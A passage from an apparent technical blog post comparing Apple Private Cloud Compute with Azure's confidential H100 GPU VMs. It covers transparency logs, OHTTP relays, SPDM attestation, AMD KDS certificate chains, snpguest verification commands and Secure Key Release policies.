&lt;p&gt;Microsoft&apos;s &lt;code&gt;NCCads_H100_v5&lt;/code&gt; confidential GPU VM family -- 4th-Gen AMD EPYC Genoa CPU plus one NVIDIA H100 NVL GPU per VM, with the TEE spanning both [@ms-sku-nccads] -- reached general availability on September 24, 2024 [@ms-h100-ga]. The companion Microsoft Trustworthy AI post made the same architectural commitment: customer data and models remain inaccessible to Microsoft itself [@ms-trustworthy-ai] [@ms-h100-ga]. NVIDIA&apos;s parallel announcement underscored the same fact verbatim: &quot;Azure is the first cloud provider to offer confidential computing with NVIDIA H100 GPUs&quot; [@nvidia-h100-ga].&lt;/p&gt;
&lt;p&gt;Then on October 24, 2024 Apple published the supporting source code at &lt;code&gt;github.com/apple/security-pcc&lt;/code&gt;, shipped the Virtual Research Environment with macOS Sequoia 15.1 Developer Preview, and extended the Apple Security Bounty to PCC with rewards up to $1,000,000 [@apple-pcc-research] [@apple-pcc-github]. By end of October the substrate for cloud-scale confidential AI existed in two parallel forms. But &quot;shipping&quot; does not mean &quot;settling on one architecture.&quot; Two distinct breakthroughs landed within five months of each other and took the substrate in opposite directions.&lt;/p&gt;

flowchart LR
    A[Attacker&lt;br /&gt;controls hypervisor] --&amp;gt;|Remaps guest GPA tables| B[SEV guest&lt;br /&gt;network service]
    B --&amp;gt;|Reads memory under remapped pages| C[Other guest memory&lt;br /&gt;still under encryption]
    B --&amp;gt;|Serves bytes over network| D[Attacker collects&lt;br /&gt;plaintext]
    style A fill:#fee,stroke:#c33,color:#7f1d1d
    style D fill:#fee,stroke:#c33,color:#7f1d1d
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; SEVered did not recover an encryption key. It did not need to. By remapping page tables the malicious hypervisor convinced the guest to serve its own encrypted contents as plaintext. The fix -- per-page ownership tracking in hardware via the AMD Reverse Map Table and analogous mechanisms in Intel TDX -- defines what a Generation-3 confidential VM is. Earlier generations encrypted memory but did not authenticate ownership. They were not isolation; they were just encryption.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;5. Two Distinct 2024 Designs&lt;/h2&gt;
&lt;p&gt;June 10, 2024, WWDC. Apple Security Engineering and Architecture -- the institutional author block of the post, along with User Privacy, Core OS, Services Engineering, and Machine Learning and AI -- publishes &quot;Private Cloud Compute: A new frontier for AI privacy in the cloud&quot; [@apple-pcc-blog]. The post enumerates five core requirements verbatim: &lt;em&gt;stateless computation on personal user data, enforceable guarantees, no privileged runtime access, non-targetability, and verifiable transparency&lt;/em&gt; [@apple-pcc-blog]. The fifth requirement is the one nothing in the field had ever shipped at this scale.&lt;/p&gt;
&lt;h3&gt;(a) Apple&apos;s Verifiable Transparency model&lt;/h3&gt;
&lt;p&gt;Every production PCC node software image hash is published to an append-only &lt;strong&gt;Transparency Log&lt;/strong&gt;. Apple&apos;s canonical terminology is &quot;Transparency Log&quot; and &quot;Release Transparency&quot; -- both are reflected in the URL path of the Apple documentation page that defines the model [@apple-pcc-release-transparency] [@apple-pcc-doc]. The user&apos;s device cryptographically refuses to forward a request to a node whose image hash is not in the log; in Apple&apos;s words, &quot;your device won&apos;t issue requests to PCC unless the OS image running in PCC is logged for inspection&quot; [@apple-pcc-blog].&lt;/p&gt;

An append-only public log of every production Private Cloud Compute node software image hash. The log is structured along the lines of RFC 6962 Certificate Transparency -- a Merkle tree of measurement entries that can be audited end-to-end without trusting any single party. Apple&apos;s canonical primary uses the terms &quot;Transparency Log&quot; and &quot;Release Transparency&quot;; &quot;Verifiable Image Catalog&quot; is not Apple terminology. The user&apos;s device refuses to forward a request to a PCC node whose image hash is not in the log, making the log a precondition for any data flow [@apple-pcc-blog] [@apple-pcc-release-transparency].
&lt;p&gt;On October 24, 2024 Apple released the supporting source code at &lt;code&gt;github.com/apple/security-pcc&lt;/code&gt;, shipped the &lt;strong&gt;Virtual Research Environment&lt;/strong&gt; (VRE) with macOS Sequoia 15.1 Developer Preview to let researchers run the PCC software stack (including a virtual Secure Enclave Processor) inside a Mac, and extended the Apple Security Bounty to PCC with rewards up to $1,000,000 [@apple-pcc-research] [@apple-pcc-github]. The README on the source release states the scope plainly: &quot;The publication of this code is intended for security research and verification purposes only&quot; [@apple-pcc-github]. The components in the release include &lt;code&gt;CloudAttestation&lt;/code&gt; (the attestation envelope library), &lt;code&gt;Thimble&lt;/code&gt; (the on-device PCC client), &lt;code&gt;splunkloggingd&lt;/code&gt; (the audited logging path), and &lt;code&gt;srd_tools&lt;/code&gt; (security-research tooling).&lt;/p&gt;

Personal user data sent to PCC isn&apos;t accessible to anyone other than the user -- not even to Apple. -- Apple Security Engineering and Architecture, June 10, 2024 [@apple-pcc-blog]
&lt;p&gt;The network ingress path to PCC reinforces the non-targetability requirement. Client requests are routed through an &lt;strong&gt;Oblivious HTTP&lt;/strong&gt; relay, operated by an independent third party rather than by Apple, that strips the client IP address before forwarding the request to the PCC cluster. OHTTP is standardised in IETF RFC 9458 by Martin Thomson and Christopher A. Wood, January 2024, with the explicit goal of letting &quot;a client make multiple requests to an origin server without that server being able to link those requests to the client or to identify the requests as having come from the same client&quot; [@ietf-rfc9458].&lt;/p&gt;
&lt;p&gt;Apple&apos;s Target Diffusion design layers an &lt;a href=&quot;https://paragmali.com/blog/the-age-gate-that-doesnt-know-your-age-how-anonymous-credent/&quot; rel=&quot;noopener&quot;&gt;RSA Blind Signatures&lt;/a&gt; protocol -- RFC 9474 [@ietf-rfc9474] -- on top of the OHTTP path to issue single-use credentials, so even the relay cannot link two requests as having come from the same client.&lt;/p&gt;
&lt;p&gt;The OHTTP relay is third-party operated -- not Apple-operated. This is the architectural detail that makes non-targetability work. If Apple operated both the relay and the PCC cluster, Apple would observe the client IP at the relay and the request payload at the cluster and could correlate them. By splitting the two roles across two organizations whose business interests are not aligned, Apple can argue (and the architecture can enforce) that no single organization holds both halves of the correlation.&lt;/p&gt;

sequenceDiagram
    participant Dev as User device
    participant Log as Transparency Log
    participant Relay as OHTTP relay (third party)
    participant Node as PCC node (SEP-rooted)
    Dev-&amp;gt;&amp;gt;Log: fetch current log root
    Log--&amp;gt;&amp;gt;Dev: signed root, inclusion proofs
    Dev-&amp;gt;&amp;gt;Dev: verify target image hash is in log
    Dev-&amp;gt;&amp;gt;Relay: encrypted request (no client IP at origin)
    Relay-&amp;gt;&amp;gt;Node: forwarded request (relay IP only)
    Node-&amp;gt;&amp;gt;Node: enforce stateless processing
    Node--&amp;gt;&amp;gt;Relay: response, SEP-signed attestation envelope
    Relay--&amp;gt;&amp;gt;Dev: response delivered
    Dev-&amp;gt;&amp;gt;Dev: verify SEP attestation matches logged image
&lt;h3&gt;(b) Microsoft and NVIDIA&apos;s cross-vendor CPU+GPU TEE composition&lt;/h3&gt;
&lt;p&gt;The other 2024 breakthrough was a composition. The &lt;code&gt;Standard_NCC40ads_H100_v5&lt;/code&gt; SKU is a confidential VM whose Trusted Execution Environment &quot;spans confidential VM on the CPU and attached GPU, enabling secure offload of data, models, and computation to the GPU&quot; [@ms-sku-nccads]. The substrate is an AMD SEV-SNP confidential VM on a 4th-Gen AMD EPYC Genoa CPU. The accelerator is an NVIDIA H100 NVL GPU with 94 GB of high-bandwidth memory, operating in &lt;strong&gt;CC-On mode&lt;/strong&gt; [@ms-sku-nccads] [@nvidia-dev-blog].&lt;/p&gt;
&lt;p&gt;The H100 in CC-On mode performs secure measured boot of its firmware against an on-die hardware root of trust, then establishes mutually-authenticated SPDM (Security Protocol and Data Model) sessions with the CPU TEE driver, and routes all data movement between CPU encrypted memory and GPU encrypted HBM through an encrypted bounce buffer. The NVIDIA Developer Blog states it verbatim: &quot;a chain of trust is established through ... a security protocols and data models (SPDM) session to securely connect to the driver in a CPU TEE&quot; [@nvidia-dev-blog]. The GPU&apos;s attestation report is signed against NVIDIA&apos;s on-die root of trust and consumable through NVIDIA&apos;s NRAS (NVIDIA Remote Attestation Service) and the open-source nvtrust SDK [@nvidia-nvtrust].&lt;/p&gt;

An IETF protocol for forwarding HTTP requests through an intermediary in a way that prevents either the intermediary or the target from linking requests to a single client. Per RFC 9458 verbatim: &quot;Oblivious HTTP allows a client to make multiple requests to an origin server without that server being able to link those requests to the client or to identify the requests as having come from the same client, while placing only limited trust in the nodes used to forward the messages&quot; [@ietf-rfc9458]. Apple Private Cloud Compute uses an OHTTP relay operated by an independent third party to enforce non-targetability.
&lt;p&gt;The CPU-to-GPU interconnect throughput in H100 CC-On is bounded by CPU encryption performance, not by raw PCIe or NVLink bandwidth. The NVIDIA Developer Blog measures it verbatim: &quot;It is limited by CPU encryption performance, which we currently measure at roughly 4 GBytes/sec&quot; [@nvidia-dev-blog]. Practitioners sizing throughput around H100 NVL&apos;s 94 GB HBM3 capacity should reason about the ~4 GB/s encryption ceiling, not the headline NVLink rate. The ceiling is what makes large-model long-sequence workloads amortise the overhead well, and what makes small-model short-prompt workloads pay a higher relative cost.&lt;/p&gt;

A DMTF standard (DSP0274) that defines a mutually-authenticated message-exchange protocol between two PCIe endpoints, used in the NVIDIA H100 CC-On architecture to establish a secure session between the host CPU TEE driver and the GPU. The session protects all subsequent control-plane and data-plane traffic and lets each endpoint verify the other&apos;s identity and measurements before any sensitive data crosses the PCIe link [@dmtf-spdm] [@nvidia-dev-blog] [@nvidia-nvtrust].
&lt;p&gt;The SPDM handshake itself is specified by &lt;strong&gt;DMTF DSP0274 v1.1.0&lt;/strong&gt; [@dmtf-spdm] and walks a precise message sequence the relying-party implementer needs to know exists: &lt;code&gt;GET_VERSION&lt;/code&gt; (§10.2) negotiates the protocol version; &lt;code&gt;GET_CAPABILITIES&lt;/code&gt; (§10.3) negotiates supported capabilities; &lt;code&gt;NEGOTIATE_ALGORITHMS&lt;/code&gt; (§10.4) negotiates the cryptographic algorithm family; &lt;code&gt;GET_DIGESTS&lt;/code&gt; (§10.7) fetches device-certificate digests; &lt;code&gt;GET_CERTIFICATE&lt;/code&gt; (§10.8) retrieves the per-die device-identity certificate; &lt;code&gt;CHALLENGE_AUTH&lt;/code&gt; (§10.9) verifies the device&apos;s signature over a host-supplied nonce; &lt;code&gt;GET_MEASUREMENTS&lt;/code&gt; (§10.11) retrieves the device&apos;s runtime measurement vector; and &lt;code&gt;KEY_EXCHANGE&lt;/code&gt; (§10.16) establishes the session key over ECDHE on P-384 [@dmtf-spdm]. The first three messages are an ordered prerequisite: per DSP0274 §10.6, no other request is valid until the three-step negotiation completes [@dmtf-spdm].&lt;/p&gt;
&lt;p&gt;The negotiated crypto family for the H100 in CC-On mode is SHA-384 / ECDSA-P384 / AES-256-GCM. The device-identity certificate is signed with a per-die ECC-384 hardware-bound key burned into H100 fuses, and revocation runs through the NVIDIA OCSP endpoint -- the GPU-side analogue of the AMD KDS CRL path described later [@nvidia-dev-blog].&lt;/p&gt;

sequenceDiagram
    participant Req as Host CVM (Requester)
    participant Resp as NVIDIA H100 (Responder)
    Req-&amp;gt;&amp;gt;Resp: GET_VERSION (DSP0274 10.2)
    Resp--&amp;gt;&amp;gt;Req: VERSION
    Req-&amp;gt;&amp;gt;Resp: GET_CAPABILITIES (10.3)
    Resp--&amp;gt;&amp;gt;Req: CAPABILITIES
    Req-&amp;gt;&amp;gt;Resp: NEGOTIATE_ALGORITHMS (10.4)
    Resp--&amp;gt;&amp;gt;Req: ALGORITHMS (SHA-384, ECDSA-P384, AES-256-GCM)
    Req-&amp;gt;&amp;gt;Resp: GET_DIGESTS (10.7)
    Resp--&amp;gt;&amp;gt;Req: DIGESTS
    Req-&amp;gt;&amp;gt;Resp: GET_CERTIFICATE (10.8)
    Resp--&amp;gt;&amp;gt;Req: CERTIFICATE (per-die ECC-384)
    Req-&amp;gt;&amp;gt;Resp: CHALLENGE (10.9)
    Resp--&amp;gt;&amp;gt;Req: CHALLENGE_AUTH (signature over nonce)
    Req-&amp;gt;&amp;gt;Resp: GET_MEASUREMENTS (10.11)
    Resp--&amp;gt;&amp;gt;Req: MEASUREMENTS
    Req-&amp;gt;&amp;gt;Resp: KEY_EXCHANGE (10.16, ECDHE P-384)
    Resp--&amp;gt;&amp;gt;Req: KEY_EXCHANGE_RSP
&lt;p&gt;The NVIDIA-side verifier reference moved generations recently: the Python SDK in &lt;code&gt;NVIDIA/nvtrust&lt;/code&gt; [@nvidia-nvtrust] is now superseded by &lt;code&gt;nv-attestation-sdk-cpp&lt;/code&gt; (also called &quot;NV Attest&quot;), which NVIDIA describes as &quot;a new and improved version of the NVIDIA nvtrust attestation SDK, redesigned to address key limitations&quot; [@nvidia-attest-sdk-cpp]. The C++ SDK is the current canonical reference; the older Python SDK still works but is deprecated. The NVIDIA CC documentation index links both [@nvidia-cc-docs].&lt;/p&gt;
&lt;p&gt;The composed attestation -- the AMD SEV-SNP attestation report from the host CVM, joined with the NVIDIA-signed GPU attestation report from the H100 -- is consumable by Microsoft Azure Attestation as a single policy decision [@ms-maa-overview]. Secure Key Release from Azure Key Vault Premium or Azure Managed HSM then gates customer key material on that composite attestation, so the model weights or the user&apos;s prompt encryption key are released to the workload only when the entire chain (AMD silicon, AMD firmware, Microsoft hypervisor, customer guest OS, NVIDIA GPU firmware, NVIDIA hardware root of trust) verifies [@ms-maa-overview] [@ms-cc-overview].&lt;/p&gt;

flowchart TD
    A[Customer workload] --&amp;gt; B[Host CVM&lt;br /&gt;AMD SEV-SNP + RMP]
    B --&amp;gt;|SPDM session, mutual auth| C[NVIDIA H100 NVL&lt;br /&gt;CC-On mode]
    C --&amp;gt;|Signed GPU attestation| D[NVIDIA NRAS]
    B --&amp;gt;|SEV-SNP attestation report| E[Microsoft Azure Attestation]
    D --&amp;gt; E
    E --&amp;gt;|MAA JWT, x-ms claims| F[Azure Key Vault Premium&lt;br /&gt;or Managed HSM]
    F --&amp;gt;|SKR release policy check| G[Customer key released&lt;br /&gt;to workload]
    style C fill:#e6f3ff,stroke:#36c,color:#1a365d
    style E fill:#fff3e6,stroke:#c63,color:#7b341e

The NVIDIA H100 Tensor Core GPU is the first ever GPU to introduce support for confidential computing. -- NVIDIA Developer Blog [@nvidia-dev-blog]
&lt;p&gt;Two breakthroughs. Two cryptographic envelopes. Both prove something about a workload. Both are signed by hardware. Both will satisfy a JWT verifier. And underneath that surface similarity sits a genuinely different epistemological model.&lt;/p&gt;
&lt;p&gt;Apple PCC commits, &lt;em&gt;publicly and in advance&lt;/em&gt;, to the exact image hash that will be served, and refuses to serve any other. Azure CC-AI does not publicly commit in advance to the bits the verifier runs against -- it produces a JWT that says &quot;I verified what I was given.&quot; Both are cryptographic; one is structurally auditable by an independent researcher, the other is a single vendor&apos;s word.&lt;/p&gt;
&lt;p&gt;This is the aha moment to mark with both hands. &quot;Verify me&quot; is architecturally different from &quot;trust me,&quot; even when both produce a JWT.&lt;/p&gt;
&lt;p&gt;To turn that distinction into something a reader can carry into procurement, we have to actually walk the six axes. On which do these architectures genuinely differ, and on which do they differ only in implementation strategy?&lt;/p&gt;
&lt;h2&gt;6. Six Axes, One Difference In Kind&lt;/h2&gt;
&lt;p&gt;Of the six architectural axes, five are differences in &lt;em&gt;degree&lt;/em&gt; -- both PCC and Azure CC-AI do similar things differently. Exactly one is a difference in &lt;em&gt;kind&lt;/em&gt;: verifiable transparency of the production fleet. Apple ships a public append-only log of every production node image hash; no other major-cloud confidential-AI substrate ships an architectural equivalent as of mid-2026. The rest of this section walks each axis with the trade-off named, the threat model spelled out, and the primary cited.&lt;/p&gt;
&lt;h3&gt;Axis 1: Silicon control&lt;/h3&gt;
&lt;p&gt;PCC is a single-vendor stack end to end. Apple controls the SoC, the SEP, the firmware, the OS, the Swift-based inference runtime, and the bug-bounty program [@apple-pcc-blog]. Apple has not publicly named the specific chip family used in PCC nodes; firmware identifiers and independent analyses point to M2-Ultra-class silicon at launch (firmware identifier &lt;code&gt;ComputeModule14,1&lt;/code&gt; [@appledb-cm14]) with a transition to M5-class silicon during 2026 (identifier &lt;code&gt;J226C&lt;/code&gt; [@nine-to-five-mac-m5] [@winbuzzer-m5]), and the Apple Machine Learning Research introduction confirms only that the cloud-side model runs on &quot;Apple silicon servers&quot; without naming a generation [@apple-foundation-models].&lt;/p&gt;
&lt;p&gt;Azure CC-AI is a multi-vendor commodity composition by design. AMD provides the EPYC CPU and the AMD Platform Security Processor; Intel provides the Xeon CPU and the TDX module on the alternate Intel SKU family; NVIDIA provides the H100 GPU and the on-die hardware root of trust; Microsoft provides the hypervisor and MAA; the customer chooses the guest OS [@ms-cc-overview] [@ms-sku-nccads] [@nvidia-dev-blog].&lt;/p&gt;
&lt;p&gt;The trade-off is direct. Apple&apos;s single-vendor stack is operationally simpler and the trust posture is internally consistent, but the trust root collapses to Apple. Azure&apos;s multi-vendor stack spreads trust across four independent signers, but no one of them sees the entire system, and the composition itself is a source of complexity.&lt;/p&gt;
&lt;h3&gt;Axis 2: Hardware root of trust&lt;/h3&gt;
&lt;p&gt;PCC anchors per-node trust in the Secure Enclave Processor on each Apple-Silicon server. The SEP is bound to an Apple-controlled certificate authority; the SEP signs the node&apos;s attestation envelope; the Apple-controlled CA&apos;s chain is the root the user&apos;s device trusts [@apple-pcc-blog] [@apple-sep-guide].&lt;/p&gt;
&lt;p&gt;Azure&apos;s hardware root of trust is structurally distributed. A vTPM exposed to the CVM provides one anchor; the AMD Platform Security Processor signs SEV-SNP attestation reports with a per-chip &lt;strong&gt;Versioned Chip Endorsement Key (VCEK)&lt;/strong&gt; [@amd-kds] [@amd-sev-snp-wp]; the NVIDIA on-die RoT signs the GPU attestation; MAA operates as the verifier-of-record that joins these into a single decision artefact [@ms-maa-overview].&lt;/p&gt;

A per-die ECDSA signing key derived inside the AMD Platform Security Processor (PSP) from a chip-specific secret fused into the silicon at manufacture. The VCEK signs SEV-SNP attestation reports; the certificate chain runs `VCEK -&amp;gt; AMD SEV signing key (ASK) -&amp;gt; AMD Root Key (ARK)`, with the ARK pinned out-of-band against AMD&apos;s published fingerprint and the per-chip VCEK fetched from the AMD Key Distribution Service (KDS) at `kdsintf.amd.com` keyed on the chip ID plus the four TCB-version-vector `*Spl` parameters (`blSpl`, `teeSpl`, `snpSpl`, `ucodeSpl`) parsed out of the 1184-byte attestation report [@amd-kds] [@amd-sev-snp-wp].
&lt;p&gt;The chain itself is short and walkable. The ARK and ASK PEMs are served as a single bundle from the KDS endpoint &lt;code&gt;/vcek/v1/&amp;lt;family&amp;gt;/cert_chain&lt;/code&gt; on host &lt;code&gt;kdsintf.amd.com&lt;/code&gt; (returning, on the Milan family, an &lt;code&gt;ARK-Milan&lt;/code&gt; and &lt;code&gt;SEV-Milan&lt;/code&gt; certificate pair issued from AMD Engineering&apos;s Santa Clara CA with 25-year validity dated 2020-10-22 [@amd-kds]). The per-die VCEK is served from &lt;code&gt;/vcek/v1/&amp;lt;family&amp;gt;/&amp;lt;chip_id&amp;gt;?blSpl=..&amp;amp;teeSpl=..&amp;amp;snpSpl=..&amp;amp;ucodeSpl=..&lt;/code&gt; on the same KDS host, where the chip ID and the four &lt;code&gt;*Spl&lt;/code&gt; TCB-version-vector query parameters are parsed out of the SEV-SNP attestation report itself.&lt;/p&gt;
&lt;p&gt;A relying party that wants to verify a SEV-SNP attestation &lt;em&gt;without&lt;/em&gt; trusting MAA fetches the chain from KDS, validates the chain against an out-of-band-pinned ARK fingerprint, and checks that the chip ID and TCB version in the report match the chain. The canonical open-source CLI for this is &lt;code&gt;virtee/snpguest&lt;/code&gt; [@virtee-snpguest], the active successor to the deprecated &lt;code&gt;AMDESE/sev-tool&lt;/code&gt; [@amd-sev-tool].&lt;/p&gt;
&lt;h3&gt;Axis 3: Attestation surface&lt;/h3&gt;
&lt;p&gt;PCC produces a per-device attestation envelope cross-checked against the public Transparency Log. The user&apos;s device does not just verify the SEP signature; it verifies that the image hash named in the envelope is included in the public log. If the hash is not in the log, the device refuses to forward the request [@apple-pcc-blog] [@apple-pcc-release-transparency].&lt;/p&gt;
&lt;p&gt;Azure produces an MAA-issued JWT. The customer&apos;s relying party parses the JWT and matches claims. The MAA overview documents the SEV-SNP-specific claims and the platform-vs-guest distinction explicitly [@ms-maa-overview]. For confidential GPU workloads, NVIDIA&apos;s NRAS claims about the H100 are joined into the same JWT.&lt;/p&gt;
&lt;p&gt;The procurement-grade payoff: a customer can verify SEV-SNP attestation &lt;em&gt;without&lt;/em&gt; trusting MAA by running the &lt;code&gt;snpguest&lt;/code&gt; workflow directly against the AMD KDS [@virtee-snpguest] [@amd-kds]. Or they can trust MAA&apos;s JWT and validate it against the MAA JWKS, trading one trust anchor (AMD&apos;s ARK fingerprint) for another (Microsoft&apos;s JWKS). Both paths are real; most production customers deploy the MAA path because it is operationally simpler, but the &lt;code&gt;snpguest&lt;/code&gt;-based path is what unlocks &quot;we do not have to trust MAA&quot; for a procurement audit.&lt;/p&gt;
&lt;p&gt;{`
// Demonstrates the structure of an MAA JWT for an AMD SEV-SNP confidential VM.
// In production the JWT would be signed by an MAA tenant key and verified
// against the tenant&apos;s JWKS endpoint. This example just decodes a sample payload.&lt;/p&gt;
&lt;p&gt;const sampleMaaJwt = [
  // header (base64url)
  &apos;eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9&apos;,
  // payload (base64url) -- sample x-ms claims
  &apos;eyJ4LW1zLWlzb2xhdGlvbi10ZWUiOiJzZXZzbnB2bSIsIngtbXMtY29tcGxpYW5jZS1zdGF0dXMiOiJhenVyZS1jb21wbGlhbnQtY3ZtIiwieC1tcy1zZXZzbnB2bS1ndWVzdHN2biI6OCwieC1tcy1zZXZzbnB2bS1sYXVuY2htZWFzdXJlbWVudCI6InhEa0...&quot;,&quot;x-ms-runtime&quot;:&quot;e30=&quot;}&apos;,
  // signature placeholder
  &apos;signature&apos;
].join(&apos;.&apos;);&lt;/p&gt;
&lt;p&gt;function decodeJwtPayload(jwt) {
  const [, payload] = jwt.split(&apos;.&apos;);
  // base64url -&amp;gt; base64
  const b64 = payload.replace(/-/g, &apos;+&apos;).replace(/_/g, &apos;/&apos;);
  return JSON.parse(atob(b64));
}&lt;/p&gt;
&lt;p&gt;const payload = decodeJwtPayload(sampleMaaJwt);
console.log(&apos;TEE family:        &apos;, payload[&apos;x-ms-isolation-tee&apos;]);
console.log(&apos;Compliance status: &apos;, payload[&apos;x-ms-compliance-status&apos;]);
console.log(&apos;Guest SVN:         &apos;, payload[&apos;x-ms-sevsnpvm-guestsvn&apos;]);
console.log(&apos;Launch measurement:&apos;, payload[&apos;x-ms-sevsnpvm-launchmeasurement&apos;]);&lt;/p&gt;
&lt;p&gt;// A Secure Key Release policy would gate key release on claims like:
//   &quot;x-ms-isolation-tee&quot; == &quot;sevsnpvm&quot;
//   &quot;x-ms-compliance-status&quot; == &quot;azure-compliant-cvm&quot;
//   &quot;x-ms-sevsnpvm-guestsvn&quot; &amp;gt;= 8
// matched against the MAA-issued JWT.
`}&lt;/p&gt;

The MAA path hides KDS fetching, certificate-chain validation, and TCB-rollback policy enforcement from the relying party by emitting a JWT whose `x-ms-attestation-type` claim is `sevsnpvm` and `x-ms-compliance-status` claim is `azure-compliant-cvm`. The relying party then validates against the MAA JWKS instead of pinning the AMD ARK fingerprint. Operationally simpler, but it trades trust in AMD for trust in MAA. A customer that wants a procurement-defensible &quot;we do not have to trust MAA&quot; posture runs the six-step `snpguest` Regular Attestation Workflow directly against the AMD KDS [@virtee-snpguest]. The `snpguest verify certs` step validates the VCEK -&amp;gt; ASK -&amp;gt; ARK chain but cannot detect a substituted ARK; the ARK fingerprint must be pinned out-of-band against AMD&apos;s published value before the chain is trusted. The other architectural delta: `snpguest verify attestation` checks the TCB version vector in the attestation report against the version baked into the VCEK certificate, surfacing TCB rollback. Once both checks pass, the relying party has cryptographic evidence the workload is running on a specific physical AMD CPU at a specific firmware level -- without ever talking to Microsoft.
&lt;p&gt;{`# The six-step Regular Attestation Workflow from the virtee/snpguest README.&lt;/p&gt;
Each step maps to a wire-level KDS GET except step 1 (which talks to the SNP
guest firmware device locally). Run this from inside an SEV-SNP guest VM on
Azure (e.g. on a DCasv5 SKU) -- not from the host.
Step 1: ask the guest firmware for a fresh attestation report bound to a
64-byte nonce. The report includes chip_id and the four *Spl TCB vector
fields the next steps will use to fetch the per-die VCEK.
&lt;p&gt;snpguest report attestation-report.bin request-data.bin --random&lt;/p&gt;
Step 2: fetch the ARK + ASK PEM bundle for this CPU family from AMD KDS.
Endpoint: GET /vcek/v1//cert_chain on host kdsintf.amd.com
&lt;p&gt;snpguest fetch ca pem milan ./certs&lt;/p&gt;
Step 3: fetch the per-die VCEK certificate from AMD KDS, keyed on chip_id
and the four *Spl values parsed out of the attestation report.
Endpoint: GET /vcek/v1//?blSpl=..&amp;amp;... on the KDS host
&lt;p&gt;snpguest fetch vcek pem milan ./certs attestation-report.bin&lt;/p&gt;
Step 4: fetch the current AMD CRL so revoked VCEKs can be rejected.
Endpoint: GET /vcek/v1//crl on the KDS host
&lt;p&gt;snpguest fetch crl pem milan ./certs&lt;/p&gt;
Step 5: validate the chain locally (VCEK -&amp;gt; ASK -&amp;gt; ARK).
IMPORTANT: snpguest cannot detect a substituted ARK. Before running this
command, pin the ARK fingerprint out-of-band against AMD&apos;s published value.
&lt;p&gt;snpguest verify certs ./certs&lt;/p&gt;
Step 6: verify the attestation signature with the validated VCEK and check
the TCB version vector in the report against the VCEK certificate.
This is the step that surfaces TCB rollback.
&lt;p&gt;snpguest verify attestation ./certs attestation-report.bin
`}&lt;/p&gt;
&lt;h3&gt;Axis 4: Key release and state model&lt;/h3&gt;
&lt;p&gt;This is where the architectural philosophies diverge most visibly. PCC nodes are &lt;em&gt;stateless by design&lt;/em&gt;. There is no customer key material on the node, no key release ceremony, no HSM gating. Apple&apos;s first core requirement names this verbatim: &quot;stateless computation on personal user data&quot; [@apple-pcc-blog]. State that needs to persist across requests does so on the user&apos;s device, not on the PCC fleet.&lt;/p&gt;
&lt;p&gt;Azure treats stateful, customer-managed keys as a first-class architectural primitive. Secure Key Release from Azure Key Vault Premium or Azure Managed HSM gates key release on an MAA-issued JWT whose claims must match the release policy attached to the encrypted key [@ms-cc-overview]. The Microsoft reference confidential-LLM tutorial walks the SKR-from-AKV-Premium flow end to end on a &lt;code&gt;Standard_NCC40ads_H100_v5&lt;/code&gt; SKU [@ms-workshop-llm]. Customer-managed keys, customer-controlled HSMs, and customer audit logs are how regulated buyers reason about confidential workloads, and Azure&apos;s design accommodates that workflow directly.&lt;/p&gt;

A minimal SKR release policy is a JSON document referencing MAA-issued claims. A simplified example for an SEV-SNP CVM target:&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{
  &quot;version&quot;: &quot;1.0.0&quot;,
  &quot;anyOf&quot;: [
    {
      &quot;authority&quot;: &quot;&amp;lt;your MAA tenant URL&amp;gt;&quot;,
      &quot;allOf&quot;: [
        { &quot;claim&quot;: &quot;x-ms-isolation-tee&quot;, &quot;equals&quot;: &quot;sevsnpvm&quot; },
        { &quot;claim&quot;: &quot;x-ms-compliance-status&quot;, &quot;equals&quot;: &quot;azure-compliant-cvm&quot; },
        { &quot;claim&quot;: &quot;x-ms-sevsnpvm-guestsvn&quot;, &quot;greater-than-or-equals&quot;: 8 }
      ]
    }
  ]
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At unwrap time the HSM evaluates the policy against the JWT the workload presents. Only if every condition is met is the key material released. The policy is bound to the key at creation time and cannot be modified after the fact without rewrapping under a fresh policy.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;Axis 5: GPU TEE&lt;/h3&gt;
&lt;p&gt;PCC uses Apple GPUs that are integrated on the same SoC as the CPU and SEP. By construction they sit inside the same SEP-rooted attestation envelope -- there is no separate cross-vendor PCIe attestation handshake because there is no PCIe handshake to begin with [@apple-pcc-blog].&lt;/p&gt;
&lt;p&gt;Azure uses NVIDIA H100 NVL GPUs in CC-On mode, with the architecture described above: on-die RoT, SPDM session, encrypted bounce buffer, NRAS-signed attestation report joined to the SEV-SNP CVM attestation through MAA [@ms-sku-nccads] [@nvidia-dev-blog]. The NVIDIA H100 exposes &lt;em&gt;three&lt;/em&gt; confidential-computing modes: &lt;strong&gt;CC-Off&lt;/strong&gt; (the normal non-confidential default; no isolation, no encryption); &lt;strong&gt;CC-On&lt;/strong&gt; (full confidential mode, the only mode that should be used in production); and &lt;strong&gt;CC-DevTools&lt;/strong&gt; (per NVIDIA&apos;s developer blog, &quot;a partial CC mode that will match the workflows of CC-On mode, but with security protections disabled and performance counters enabled&quot; [@nvidia-dev-blog]) [@nvidia-cc-docs]. The three modes share a bring-up surface, but only CC-On enforces the full isolation contract.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; NVIDIA&apos;s documentation is explicit that CC-DevTools weakens isolation specifically so that profiling and debugging tools that need performance-counter access can work [@nvidia-cc-docs]. Production confidential-AI workloads must run in CC-On. Verification step for relying parties: the GPU attestation report includes a mode field; the MAA JWT and the NRAS attestation that compose into it both surface this. A release policy that does not check the GPU mode field can release customer key material to a workload running on a partially-protected GPU. Treat CC-DevTools as a bring-up state, not a deployment state.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;AMD&apos;s MI300X GPU ships as compute across multiple clouds (Oracle OCI, DigitalOcean, Vultr, Crusoe, TensorWave, Hot Aisle, Seeweb [@mi300x-cloud-list]) but has &lt;em&gt;no&lt;/em&gt; production-equivalent confidential-GPU mode at GA on a major commercial cloud as of mid-2026. PCIe TDISP and SEV-TIO Linux support is landing in 2025-2026 kernels, but the GA gap is the load-bearing fact for any procurement that prefers AMD over NVIDIA at the accelerator tier. Azure&apos;s confidential GPU offering is H100-only at GA.&lt;/p&gt;
